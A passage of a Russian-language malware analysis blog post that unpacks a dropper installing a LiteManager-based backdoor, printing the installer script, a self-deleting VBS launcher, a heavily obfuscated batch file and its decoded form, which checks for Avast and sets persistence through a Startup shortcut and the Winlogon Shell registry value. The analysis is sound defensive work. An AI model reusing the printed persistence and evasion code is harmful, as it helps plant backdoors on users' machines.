d:\\virus\\poi>innounp -x -p345465122345 poi.exe ; Version detected: 5500 (Unicode) #0 {app}\\avicap32.dll Reading slice d:\\virus\\poi\\poi.exe #1 {app}\\ctfmon.exe #2 {app}\\test.bat #3 {app}\\test.vbs #4 install_script.iss <\/code><\/pre>\n
  \u0420\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u0449\u0438\u043a \u0431\u044b\u0441\u0442\u0440\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043b \u0441\u0432\u043e\u044e \u0440\u0430\u0431\u043e\u0442\u0443 \u0438 \u044f \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u0444\u0430\u0439\u043b\u043e\u0432 \u0434\u043b\u044f \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0435\u0433\u043e \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044f. \u041d\u0430\u0447\u0430\u043b \u044f \u0441 \u0444\u0430\u0439\u043b\u0430 install_script.iss. \u0415\u0434\u0438\u043d\u0441\u0442\u0432\u0435\u043d\u043d\u043e\u0439 \u0437\u0430\u0441\u043b\u0443\u0436\u0438\u0432\u0430\u044e\u0449\u0435\u0439 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u044f \u0432 \u043d\u0451\u043c \u0431\u044b\u043b\u0430 \u0441\u0435\u043a\u0446\u0438\u044f [Run]:  <\/p>\n
Filename: "{app}\\test.vbs"; Description: "{cm:LaunchProgram,Test}"; MinVersion: 0.0,5.0; Flags: shellexec postinstall nowait <\/code><\/pre>\n
  \u0418\u0437 \u043d\u0435\u0451 \u0441\u0442\u0430\u043b\u043e \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e \u043f\u0435\u0440\u0432\u044b\u043c \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f VB-\u0441\u043a\u0440\u0438\u043f\u0442 test.vbs:  <\/p>\n
On Error Resume Next Set WshShell = CreateObject("WScript.Shell") WshShell.Run "test.bat",0,true Set FSO = CreateObject("Scripting.FileSystemObject") FSO.DeleteFile WScript.ScriptFullName, 0 <\/code><\/pre>\n
  \u0421\u043a\u0440\u0438\u043f\u0442 \u0442\u043e\u0436\u0435 \u043d\u0435\u0441\u043b\u043e\u0436\u043d\u044b\u0439: \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442 test.bat \u0438 \u0441\u0430\u043c\u043e\u0443\u043d\u0438\u0447\u0442\u043e\u0436\u0430\u0435\u0442\u0441\u044f.<\/p>\n
  \u0422\u0435\u043f\u0435\u0440\u044c \u0441\u043c\u043e\u0442\u0440\u0438\u043c test.bat:<\/p>\n
\u0422\u044c\u0444\u0443 \u0442\u044b, \u0447\u0451\u0440\u0442, \u0442\u0435\u043f\u0435\u0440\u044c \u042e\u0441\u0442\u0430\u0441 \u0442\u0435\u043b\u0435\u0433\u0440\u0430\u0444\u0438\u0440\u0443\u0435\u0442 \u0410\u043b\u0435\u043a\u0441\u0443!<\/b><\/p>\n
\n
set lpQmnLQ=set %lpQmnLQ% RCRUDqE= %lpQmnLQ%%RCRUDqE%yFcQKpJyG== %lpQmnLQ%%RCRUDqE%aaLTgkA%yFcQKpJyG%# %lpQmnLQ%%RCRUDqE%kOXeOOyR%yFcQKpJyG%@ %lpQmnLQ%%RCRUDqE%toTUt%yFcQKpJyG%o %lpQmnLQ%%RCRUDqE%mRMLJkAp%yFcQKpJyG%\/ %lpQmnLQ%%RCRUDqE%IHrQ%yFcQKpJyG%; %lpQmnLQ%%RCRUDqE%immQQhH%yFcQKpJyG%c %lpQmnLQ%%RCRUDqE%ksBw%yFcQKpJyG%Q %lpQmnLQ%%RCRUDqE%qlLeeJ%yFcQKpJyG%f %lpQmnLQ%%RCRUDqE%QvBGN%yFcQKpJyG%E %lpQmnLQ%%RCRUDqE%SAKEFniaY%yFcQKpJyG%G %lpQmnLQ%%RCRUDqE%hmixayLOL%yFcQKpJyG%M %lpQmnLQ%%RCRUDqE%oaLFfs%yFcQKpJyG%} %lpQmnLQ%%RCRUDqE%NjHP%yFcQKpJyG%K %lpQmnLQ%%RCRUDqE%MuOksUDd%yFcQKpJyG%u %lpQmnLQ%%RCRUDqE%upeuMhJ%yFcQKpJyG%H %lpQmnLQ%%RCRUDqE%mOMhgb%yFcQKpJyG%y %lpQmnLQ%%RCRUDqE%NSQCAVz%yFcQKpJyG%: %lpQmnLQ%%RCRUDqE%dxmCkR%yFcQKpJyG%[ %lpQmnLQ%%RCRUDqE%ScSLQo%yFcQKpJyG%l %lpQmnLQ%%RCRUDqE%iGpKA%yFcQKpJyG%0 %lpQmnLQ%%RCRUDqE%MKbjyO%yFcQKpJyG%R %lpQmnLQ%%RCRUDqE%tCgoVQ%yFcQKpJyG%+ %lpQmnLQ%%RCRUDqE%KbJyRFMVu%yFcQKpJyG%( %lpQmnLQ%%RCRUDqE%yOmTK%yFcQKpJyG%B %lpQmnLQ%%RCRUDqE%DGHR%yFcQKpJyG%8 %lpQmnLQ%%RCRUDqE%LKQhkKSem%yFcQKpJyG%s %lpQmnLQ%%RCRUDqE%UtIjaUOl%yFcQKpJyG%X %lpQmnLQ%%RCRUDqE%KYddI%yFcQKpJyG%A %lpQmnLQ%%RCRUDqE%TMuVQ%yFcQKpJyG%4 %lpQmnLQ%%RCRUDqE%dAMOY%yFcQKpJyG%) %lpQmnLQ%%RCRUDqE%vpVg%yFcQKpJyG%_ %lpQmnLQ%%RCRUDqE%aeVO%yFcQKpJyG%J %lpQmnLQ%%RCRUDqE%YrtVU%yFcQKpJyG%b %lpQmnLQ%%RCRUDqE%vANLWtdW%yFcQKpJyG%d %lpQmnLQ%%RCRUDqE%tNqAVXbz%yFcQKpJyG%m %lpQmnLQ%%RCRUDqE%LkyqXKNYc%yFcQKpJyG%e %lpQmnLQ%%RCRUDqE%ltuAgKR%yFcQKpJyG%w %lpQmnLQ%%RCRUDqE%GNbpPXWvQ%yFcQKpJyG%a %lpQmnLQ%%RCRUDqE%QBmzz%yFcQKpJyG%i %lpQmnLQ%%RCRUDqE%pNywcj%yFcQKpJyG%C %lpQmnLQ%%RCRUDqE%sQrHzBN%yFcQKpJyG%v %lpQmnLQ%%RCRUDqE%DCbQQGfkL%yFcQKpJyG%2 %lpQmnLQ%%RCRUDqE%zUwuD%yFcQKpJyG%z %lpQmnLQ%%RCRUDqE%abWkRpti%yFcQKpJyG%S %lpQmnLQ%%RCRUDqE%mPVfEbE%yFcQKpJyG%r %lpQmnLQ%%RCRUDqE%sIluXDQS%yFcQKpJyG%7 %lpQmnLQ%%RCRUDqE%OWatTKvD%yFcQKpJyG%x %lpQmnLQ%%RCRUDqE%krFh%yFcQKpJyG%5 %lpQmnLQ%%RCRUDqE%UdGiq%yFcQKpJyG%T %lpQmnLQ%%RCRUDqE%kHci%yFcQKpJyG%] %lpQmnLQ%%RCRUDqE%pVCdLFa%yFcQKpJyG%, %lpQmnLQ%%RCRUDqE%nmvE%yFcQKpJyG%j %lpQmnLQ%%RCRUDqE%zHzGVcDcY%yFcQKpJyG%k %lpQmnLQ%%RCRUDqE%GAJoRj%yFcQKpJyG%n %lpQmnLQ%%RCRUDqE%DNmdQ%yFcQKpJyG%q %lpQmnLQ%%RCRUDqE%oAndDQK%yFcQKpJyG%L %lpQmnLQ%%RCRUDqE%lSBY%yFcQKpJyG%O %lpQmnLQ%%RCRUDqE%JcERxC%yFcQKpJyG%h %lpQmnLQ%%RCRUDqE%pcEihxAuJ%yFcQKpJyG%I %lpQmnLQ%%RCRUDqE%shHyBbWt%yFcQKpJyG%. %lpQmnLQ%%RCRUDqE%KAFkG%yFcQKpJyG%- %lpQmnLQ%%RCRUDqE%AdQY%yFcQKpJyG%t %lpQmnLQ%%RCRUDqE%pIxi%yFcQKpJyG%Y %lpQmnLQ%%RCRUDqE%TKaBbO%yFcQKpJyG%1 %lpQmnLQ%%RCRUDqE%pCQWd%yFcQKpJyG%F %lpQmnLQ%%RCRUDqE%gEuKD%yFcQKpJyG%V %lpQmnLQ%%RCRUDqE%ulmeh%yFcQKpJyG%9 %lpQmnLQ%%RCRUDqE%nFjJmCQ%yFcQKpJyG%N %lpQmnLQ%%RCRUDqE%hdvdM%yFcQKpJyG%W %lpQmnLQ%%RCRUDqE%jgpoj%yFcQKpJyG%" %lpQmnLQ%%RCRUDqE%xMhHMK%yFcQKpJyG%6 %lpQmnLQ%%RCRUDqE%aOOInC%yFcQKpJyG%3 %lpQmnLQ%%RCRUDqE%GLznBQ%yFcQKpJyG%U %lpQmnLQ%%RCRUDqE%oFHOxG%yFcQKpJyG%g %lpQmnLQ%%RCRUDqE%KudP%yFcQKpJyG%{ %lpQmnLQ%%RCRUDqE%QSrCDDA%yFcQKpJyG%$ %lpQmnLQ%%RCRUDqE%XLAkzKtxq%yFcQKpJyG%* %lpQmnLQ%%RCRUDqE%opQB%yFcQKpJyG%Z %lpQmnLQ%%RCRUDqE%wjTBiTbn%yFcQKpJyG%\\ %lpQmnLQ%%RCRUDqE%XnXWCNDJO%yFcQKpJyG%! %lpQmnLQ%%RCRUDqE%fjxrTBqkC%yFcQKpJyG%p %lpQmnLQ%%RCRUDqE%DuPVUEGE%yFcQKpJyG%D %lpQmnLQ%%RCRUDqE%mnCdWrg%yFcQKpJyG%? %lpQmnLQ%%RCRUDqE%DYBqxQkr%yFcQKpJyG%P %AdQY%%GNbpPXWvQ%%LKQhkKSem%%zHzGVcDcY%%ScSLQo%%QBmzz%%LKQhkKSem%%AdQY%%RCRUDqE%|%RCRUDqE%%qlLeeJ%%QBmzz%%GAJoRj%%vANLWtdW%%RCRUDqE%%jgpoj%%KYddI%%sQrHzBN%%GNbpPXWvQ%%LKQhkKSem%%AdQY%%GLznBQ%%pcEihxAuJ%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc%%jgpoj% %QBmzz%%qlLeeJ%%RCRUDqE%%LkyqXKNYc%%mPVfEbE%%mPVfEbE%%toTUt%%mPVfEbE%%ScSLQo%%LkyqXKNYc%%sQrHzBN%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%TKaBbO%%RCRUDqE%%oFHOxG%%toTUt%%AdQY%%toTUt%%RCRUDqE%%nFjJmCQ%%toTUt%%MKbjyO%%LkyqXKNYc%%immQQhH%%toTUt%%mPVfEbE%%vANLWtdW% %immQQhH%%vANLWtdW%%RCRUDqE%%jgpoj%%appData%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%immQQhH%%toTUt%%qlLeeJ%%AdQY%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%wjTBiTbn%%jgpoj% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%LKQhkKSem%%LkyqXKNYc%%GAJoRj%%vANLWtdW%%toTUt%%zHzGVcDcY%%shHyBbWt%%AdQY%%OWatTKvD%%AdQY% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%fjxrTBqkC%%toTUt%%QBmzz%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc% %kOXeOOyR%%tNqAVXbz%%LKQhkKSem%%JcERxC%%AdQY%%GNbpPXWvQ%%RCRUDqE%%sQrHzBN%%YrtVU%%LKQhkKSem%%immQQhH%%mPVfEbE%%QBmzz%%fjxrTBqkC%%AdQY%%NSQCAVz%%QvBGN%%OWatTKvD%%LkyqXKNYc%%immQQhH%%MuOksUDd%%AdQY%%LkyqXKNYc%%KbJyRFMVu%%jgpoj%%abWkRpti%%LkyqXKNYc%%AdQY%%RCRUDqE%%OWatTKvD%%yFcQKpJyG%%pNywcj%%mPVfEbE%%LkyqXKNYc%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%lSBY%%YrtVU%%nmvE%%LkyqXKNYc%%immQQhH%%AdQY%%KbJyRFMVu%%jgpoj%%jgpoj%%hdvdM%%abWkRpti%%immQQhH%%mPVfEbE%%QBmzz%%fjxrTBqkC%%AdQY%%shHyBbWt%%abWkRpti%%JcERxC%%LkyqXKNYc%%ScSLQo%%ScSLQo%%jgpoj%%jgpoj%%dAMOY%%NSQCAVz%%abWkRpti%%LkyqXKNYc%%AdQY%%RCRUDqE%%mOMhgb%%yFcQKpJyG%%OWatTKvD%%shHyBbWt%%pNywcj%%mPVfEbE%%LkyqXKNYc%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%abWkRpti%%JcERxC%%toTUt%%mPVfEbE%%AdQY%%immQQhH%%MuOksUDd%%AdQY%%KbJyRFMVu%%OWatTKvD%%shHyBbWt%%abWkRpti%%fjxrTBqkC%%LkyqXKNYc%%immQQhH%%QBmzz%%GNbpPXWvQ%%ScSLQo%%pCQWd%%toTUt%%ScSLQo%%vANLWtdW%%LkyqXKNYc%%mPVfEbE%%LKQhkKSem%%KbJyRFMVu%%jgpoj%%jgpoj%%abWkRpti%%AdQY%%GNbpPXWvQ%%mPVfEbE%%AdQY%%MuOksUDd%%fjxrTBqkC%%jgpoj%%jgpoj%%dAMOY%%tCgoVQ%%jgpoj%%jgpoj%%wjTBiTbn%%hdvdM%%QBmzz%%GAJoRj%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%shHyBbWt%%ScSLQo%%GAJoRj%%zHzGVcDcY%%jgpoj%%jgpoj%%dAMOY%%NSQCAVz%%mOMhgb%%shHyBbWt%%UdGiq%%GNbpPXWvQ%%mPVfEbE%%oFHOxG%%LkyqXKNYc%%AdQY%%DYBqxQkr%%GNbpPXWvQ%%AdQY%%JcERxC%%yFcQKpJyG%%jgpoj%%jgpoj%%~dp0ctfmon.exe"":y.Save():Close()") %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%0%RCRUDqE%>%RCRUDqE%%GAJoRj%%MuOksUDd%%ScSLQo% %oFHOxG%%toTUt%%AdQY%%toTUt%%RCRUDqE%%DuPVUEGE%%toTUt%%GAJoRj%%LkyqXKNYc% :NoRecord %mPVfEbE%%LkyqXKNYc%%oFHOxG%%RCRUDqE%%GNbpPXWvQ%%vANLWtdW%%vANLWtdW%%RCRUDqE%%jgpoj%%upeuMhJ%%NjHP%%QvBGN%%pIxi%%vpVg%%pNywcj%%GLznBQ%%MKbjyO%%MKbjyO%%QvBGN%%nFjJmCQ%%UdGiq%%vpVg%%GLznBQ%%abWkRpti%%QvBGN%%MKbjyO%%wjTBiTbn%%abWkRpti%%toTUt%%qlLeeJ%%AdQY%%ltuAgKR%%GNbpPXWvQ%%mPVfEbE%%LkyqXKNYc%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%LKQhkKSem%%toTUt%%qlLeeJ%%AdQY%%wjTBiTbn%%hdvdM%%QBmzz%%GAJoRj%%vANLWtdW%%toTUt%%ltuAgKR%%LKQhkKSem%%RCRUDqE%%nFjJmCQ%%UdGiq%%wjTBiTbn%%pNywcj%%MuOksUDd%%mPVfEbE%%mPVfEbE%%LkyqXKNYc%%GAJoRj%%AdQY%%gEuKD%%LkyqXKNYc%%mPVfEbE%%LKQhkKSem%%QBmzz%%toTUt%%GAJoRj%%wjTBiTbn%%hdvdM%%QBmzz%%GAJoRj%%ScSLQo%%toTUt%%oFHOxG%%toTUt%%GAJoRj%%jgpoj%%RCRUDqE%%mRMLJkAp%%sQrHzBN%%RCRUDqE%%jgpoj%%abWkRpti%%JcERxC%%LkyqXKNYc%%ScSLQo%%ScSLQo%%jgpoj%%RCRUDqE%%mRMLJkAp%%AdQY%%RCRUDqE%%MKbjyO%%QvBGN%%SAKEFniaY%%vpVg%%abWkRpti%%opQB%%RCRUDqE%%mRMLJkAp%%vANLWtdW%%RCRUDqE%%jgpoj%%appData%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%immQQhH%%toTUt%%qlLeeJ%%AdQY%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%wjTBiTbn%%immQQhH%%AdQY%%qlLeeJ%%tNqAVXbz%%toTUt%%GAJoRj%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc%%RCRUDqE%%pVCdLFa%%RCRUDqE%%LkyqXKNYc%%OWatTKvD%%fjxrTBqkC%%ScSLQo%%toTUt%%mPVfEbE%%LkyqXKNYc%%mPVfEbE%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc%%jgpoj%%RCRUDqE%%RCRUDqE%%mRMLJkAp%%qlLeeJ% %immQQhH%%vANLWtdW%%RCRUDqE%%jgpoj%%appData%%wjTBiTbn%%hmixayLOL%%QBmzz%%immQQhH%%mPVfEbE%%toTUt%%immQQhH%%toTUt%%qlLeeJ%%AdQY%%GLznBQ%%fjxrTBqkC%%vANLWtdW%%GNbpPXWvQ%%AdQY%%LkyqXKNYc%%wjTBiTbn%%jgpoj% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%LKQhkKSem%%LkyqXKNYc%%GAJoRj%%vANLWtdW%%toTUt%%zHzGVcDcY%%shHyBbWt%%AdQY%%OWatTKvD%%AdQY% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%fjxrTBqkC%%toTUt%%QBmzz%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc% %LKQhkKSem%%AdQY%%GNbpPXWvQ%%mPVfEbE%%AdQY%%RCRUDqE%%immQQhH%%AdQY%%qlLeeJ%%tNqAVXbz%%toTUt%%GAJoRj%%shHyBbWt%%LkyqXKNYc%%OWatTKvD%%LkyqXKNYc% %vANLWtdW%%LkyqXKNYc%%ScSLQo%%RCRUDqE%%0%RCRUDqE%>%RCRUDqE%%GAJoRj%%MuOksUDd%%ScSLQo% :Done <\/code><\/pre>\n
  <\/div>\n<\/div>\n
  \u041b\u0435\u043d\u044c \u043e\u043f\u044f\u0442\u044c \u0432\u0437\u044f\u043b\u0430 \u0432\u0435\u0440\u0445 \u043d\u0430\u0434\u043e \u043c\u043d\u043e\u0439, \u043f\u043e\u044d\u0442\u043e\u043c\u0443 \u043d\u0430 \u044d\u0442\u043e\u0442 \u0440\u0430\u0437 \u044f \u043d\u0435 \u0441\u0442\u0430\u043b \u043f\u0430\u0440\u0438\u0442\u044c\u0441\u044f \u0441 \u0440\u0435\u0434\u0430\u043a\u0442\u043e\u0440\u0430\u043c\u0438, \u0430 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u043b \u0434\u0440\u0443\u0433\u0430 \u043d\u0430\u043f\u0438\u0441\u0430\u0442\u044c \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043a\u0443 \u043d\u0430 C#. \u0427\u0442\u043e \u043e\u043d \u0438 \u0441\u0434\u0435\u043b\u0430\u043b. \u041d\u0438\u0437\u043a\u0438\u0439 \u0435\u043c\u0443 \u0437\u0430 \u044d\u0442\u043e \u043f\u043e\u043a\u043b\u043e\u043d!<\/p>\n
  \u041f\u043e\u0441\u043b\u0435 \u0440\u0430\u0441\u0448\u0438\u0444\u0440\u043e\u0432\u043a\u0438 \u043f\u043e\u043b\u0443\u0447\u0438\u043b\u0441\u044f \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0439 bat-\u0444\u0430\u0439\u043b:  <\/p>\n
tasklist | find "AvastUI.exe" if errorlevel 1 goto NoRecord cd "%appData%\\MicrocoftUpdate\\" del sendok.txt del poi.exe @mshta vbscript:Execute("Set x=CreateObject(""WScript.Shell""):Set y=x.CreateShortcut(x.SpecialFolders(""Startup"")+""\\WinUpdate.lnk""):y.TargetPath=""%~dp0ctfmon.exe"":y.Save():Close()") del %0 > nul goto Done :NoRecord reg add "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon" \/v "Shell" \/t REG_SZ \/d "%appData%\\MicrocoftUpdate\\ctfmon.exe , explorer.exe"  \/f cd "%appData%\\MicrocoftUpdate\\" del sendok.txt del poi.exe start ctfmon.exe del %0 > nul :Done <\/code><\/pre>\n
  \u0422\u0443\u0442 \u043f\u0440\u043e\u0438\u0441\u0445\u043e\u0434\u0438\u0442 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0435: \u043f\u0440\u043e\u0432\u0435\u0440\u044f\u0435\u0442\u0441\u044f \u043d\u0430\u043b\u0438\u0447\u0438\u0435 \u0437\u0430\u043f\u0443\u0449\u0435\u043d\u043d\u043e\u0433\u043e \u0430\u043d\u0442\u0438\u0432\u0438\u0440\u0443\u0441\u0430 Avast. \u0415\u0441\u043b\u0438 \u0442\u0430\u043a\u043e\u0432\u043e\u0439 \u0438\u043c\u0435\u0435\u0442\u0441\u044f, \u0442\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u0445\u043e\u0434 \u0432 \u043f\u0430\u043f\u043a\u0443 "%appData%\\MicrocoftUpdate\\", \u0438\u0437 \u043d\u0435\u0451 \u0443\u0434\u0430\u043b\u044f\u044e\u0442\u0441\u044f \u0444\u0430\u0439\u043b\u044b sendok.txt \u0438 poi.exe, \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u043d\u043e\u0439 \u043f\u0430\u043f\u043a\u0435 \u00abStartup\u00bb \u0441\u043e\u0437\u0434\u0430\u0451\u0442\u0441\u044f \u044f\u0440\u043b\u044b\u043a \u0434\u043b\u044f \u0437\u0430\u043f\u0443\u0441\u043a\u0430 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b ctfmon.exe \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u043b\u0438\u043a\u0432\u0438\u0434\u0430\u0446\u0438\u044f \u0440\u0430\u0431\u043e\u0442\u0430\u044e\u0449\u0435\u0433\u043e bat-\u0444\u0430\u0439\u043b\u0430. \u041f\u0440\u0438 \u044d\u0442\u043e\u043c ctfmon.exe \u0431\u0443\u0434\u0435\u0442 \u0437\u0430\u043f\u0443\u0449\u0435\u043d \u043f\u0440\u0438 \u0441\u043b\u0435\u0434\u0443\u044e\u0449\u0435\u0439 \u043f\u0435\u0440\u0435\u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0435 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0430. \u0415\u0441\u043b\u0438 \u0436\u0435 Avast \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d, \u0442\u043e \u0432 \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u043f\u043e \u043f\u0443\u0442\u0438 \u00abHKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\u00bb \u0437\u043d\u0430\u0447\u0435\u043d\u0438\u0435 \u043a\u043b\u044e\u0447\u0430 \u00abShell\u00bb \u0437\u0430\u043c\u0435\u043d\u044f\u0435\u0442\u0441\u044f \u043d\u0430 "%appData%\\MicrocoftUpdate\\ctfmon.exe, explorer.exe", \u043d\u0443 \u0430 \u043f\u043e\u0442\u043e\u043c \u043e\u043f\u044f\u0442\u044c \u0436\u0435 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u043f\u0435\u0440\u0435\u0445\u043e\u0434 \u0432 \u043f\u0430\u043f\u043a\u0443 "%appData%\\MicrocoftUpdate\\", \u0443\u0434\u0430\u043b\u044f\u044e\u0442\u0441\u044f \u0444\u0430\u0439\u043b\u044b sendok.txt \u0438 poi.exe, \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442\u0441\u044f ctfmon.exe \u0438 \u0432\u044b\u043f\u043e\u043b\u043d\u044f\u0435\u0442\u0441\u044f \u0441\u0430\u043c\u043e\u043b\u0438\u043a\u0432\u0438\u0434\u0430\u0446\u0438\u044f bat-\u0444\u0430\u0439\u043b\u0430. \u0422\u0430\u043a\u0438\u043c \u043e\u0431\u0440\u0430\u0437\u043e\u043c, ctfmon.exe \u0431\u0443\u0434\u0435\u0442 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0442\u044c\u0441\u044f \u043f\u0440\u0438 \u0441\u0442\u0430\u0440\u0442\u0435 \u043b\u044e\u0431\u043e\u0439 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u044b \u0447\u0435\u0440\u0435\u0437 \u041f\u0440\u043e\u0432\u043e\u0434\u043d\u0438\u043a Windows.<\/p>\n
  \u0412\u0441\u0451, \u043a\u043e\u043d\u044c \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u043b \u0441\u0432\u043e\u044e \u0433\u0440\u044f\u0437\u043d\u0443\u044e \u0440\u0430\u0431\u043e\u0442\u0443 \u2013 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u0438\u043b \u0432 \u0441\u0438\u0441\u0442\u0435\u043c\u0443 \u0431\u044d\u043a\u0434\u043e\u0440. \u0422\u0435\u043f\u0435\u0440\u044c \u043e\u0431\u0440\u0430\u0442\u0438\u043c \u0432\u0437\u043e\u0440\u044b \u043d\u0430 \u0432\u0438\u043d\u043e\u0432\u043d\u0438\u043a\u0430 \u0442\u043e\u0440\u0436\u0435\u0441\u0442\u0432\u0430 \u2014 \u0444\u0430\u0439\u043b ctfmon.exe.<\/p>\n
\u0427\u0430\u0441\u0442\u044c \u0447\u0435\u0442\u0432\u0451\u0440\u0442\u0430\u044f: \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u0435 \u0431\u044d\u043a\u0434\u043e\u0440\u0430<\/h2>\n
  \u041e\u0441\u043c\u043e\u0442\u0440 \u0431\u044d\u043a\u0434\u043e\u0440\u0430 \u043f\u0440\u043e\u0432\u043e\u0434\u0438\u043b\u0441\u044f \u0441\u043d\u0430\u0440\u0443\u0436\u0438 \u2014 \u0441 \u043f\u043e\u043c\u043e\u0449\u044c\u044e \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c Process Monitor \u0438 WireShark.<\/p>\n
  \u0421\u043d\u0430\u0447\u0430\u043b\u0430 \u0437\u0430\u0433\u043b\u044f\u043d\u0435\u043c \u0432 \u0441\u0432\u043e\u0439\u0441\u0442\u0432\u0430 exe-\u0444\u0430\u0439\u043b\u0430:
  <\/p>\n
  \u0417\u0430\u0442\u0435\u043c \u043f\u0440\u043e\u0439\u0434\u0451\u043c\u0441\u044f \u043f\u043e \u043b\u043e\u0433\u0443 Process Monitor-\u0430 \u0432 \u043f\u043e\u0438\u0441\u043a\u0430\u0445 \u0441\u043b\u043e\u0432\u0430 \u00abMicrocoft\u00bb. \u0414\u043b\u044f \u044d\u0442\u043e\u0433\u043e \u0434\u043e\u0431\u0430\u0432\u0438\u043c \u0432 \u0444\u0438\u043b\u044c\u0442\u0440 \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0435 \u043f\u0440\u0430\u0432\u0438\u043b\u043e:
  <\/p>\n
  \u0418 \u0447\u0442\u043e \u0436\u0435 \u043c\u044b \u0432\u0438\u0434\u0438\u043c? \u041c\u044b \u0432\u0438\u0434\u0438\u043c, \u0447\u0442\u043e ctfmon.exe \u0441\u043e\u0437\u0434\u0430\u0451\u0442 \u0432 \u0440\u0435\u0435\u0441\u0442\u0440\u0435 \u0432\u0435\u0441\u044c\u043c\u0430 \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u044b\u0439 \u043a\u043b\u044e\u0447:
  HKCU\\Software\\LiteManagerTeam<\/b>\\LiteManager<\/b>\\v3.4\\Config\\ServerExe<\/code>
  \u0438 \u0437\u0430\u043f\u0438\u0441\u044b\u0432\u0430\u0435\u0442 \u0432 \u044d\u0442\u043e\u0442 \u043a\u043b\u044e\u0447 \u043f\u0443\u0442\u044c \u043a \u0441\u0435\u0431\u0435, \u043b\u044e\u0431\u0438\u043c\u043e\u043c\u0443.
  <\/p>\n
  \u0418\u0437 \u0447\u0435\u0433\u043e \u044f \u0434\u0435\u043b\u0430\u044e \u043f\u0440\u0435\u0434\u043f\u043e\u043b\u043e\u0436\u0435\u043d\u0438\u0435, \u0447\u0442\u043e \u0438\u043c\u0435\u044e \u0434\u0435\u043b\u043e \u0441 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043e\u0439 LiteManager: \u0438\u0434\u0443 \u043d\u0430 \u0441\u0430\u0439\u0442 LiteManager<\/a> \u0438 \u0441\u043a\u0430\u0447\u0438\u0432\u0430\u044e \u0434\u0438\u0441\u0442\u0440\u0438\u0431\u0443\u0442\u0438\u0432 \u0434\u043b\u044f Windows<\/a>. \u041e\u0431\u0440\u0430\u0442\u0438\u0442\u0435 \u0432\u043d\u0438\u043c\u0430\u043d\u0438\u0435: \u043e\u043d \u0432\u0435\u0440\u0441\u0438\u0438 4.7.2 \u2014 \u043d\u0438\u0447\u0435\u0433\u043e \u043d\u0435 \u043d\u0430\u043f\u043e\u043c\u0438\u043d\u0430\u0435\u0442?<\/p>\n
